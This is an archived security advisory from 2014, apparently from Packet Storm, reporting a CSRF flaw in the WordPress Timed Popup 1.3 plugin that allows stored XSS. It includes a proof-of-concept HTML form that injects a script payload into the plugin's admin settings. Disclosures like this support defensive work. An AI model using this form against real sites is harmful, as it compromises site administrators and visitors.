exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Timed Popup 1.3 CSRF / XSS

WordPress Timed Popup 1.3 CSRF / XSS
Posted Dec 12, 2014
Authored by Morten Nortoft, Kenneth Jepsen, Mikkel Vej

WordPress Timed Popup plugin version 1.3 suffers from a cross site request forgery vulnerability that can be leveraged to trick an admin into storing cross site scripting code.

tags | exploit, xss, csrf
SHA-256 | 72c753afa42f6bb5721f768faba120adcedbe9224f33ea06461170cba295de31

WordPress Timed Popup 1.3 CSRF / XSS

Change Mirror Download
Title: WordPress 'Timed Popup' plugin - CSRF/XSS
Version: 1.3
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2014/12/12
Download: https://wordpress.org/plugins/wp-timed-popup/
Notified WordPress: 2014/11/27
----------------------------------------------------------------

## Description:
----------------------------------------------------------------
WordPress popup is a timed popup box that shows up on your website, and can be used as a call to action to display products, sign up for newsletters, and mainly to get the attention of your website visitors in an appealing and non-intrusive manner. It has an options page which easily allows you to change the title, text, link and allows you to integrate your existing form or newsletter form with Shotcode support. You can easily connect your mailchimp, gravity forms, contact form 7 shortcodes and get subsribers!

## CSRF:
----------------------------------------------------------------
It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page.

## Stored XSS:
----------------------------------------------------------------
Settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields.

PoC:
Log in as admin and then submit the following form.
<form method="POST" action="http://[DOMAIN]/wp-admin/options-general.php?page=wp-popup.php">
<input type="text" name="sc_popup_subtitle" value="</textarea><script>alert(1)</script>"><br />
<input type="text" name="wp_popup_save" value="Update"><br />
<input type="submit">
</form>


## Solution
----------------------------------------------------------------
No fix available.
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    38 Files
  • 24
    Sep 24th
    65 Files
  • 25
    Sep 25th
    24 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close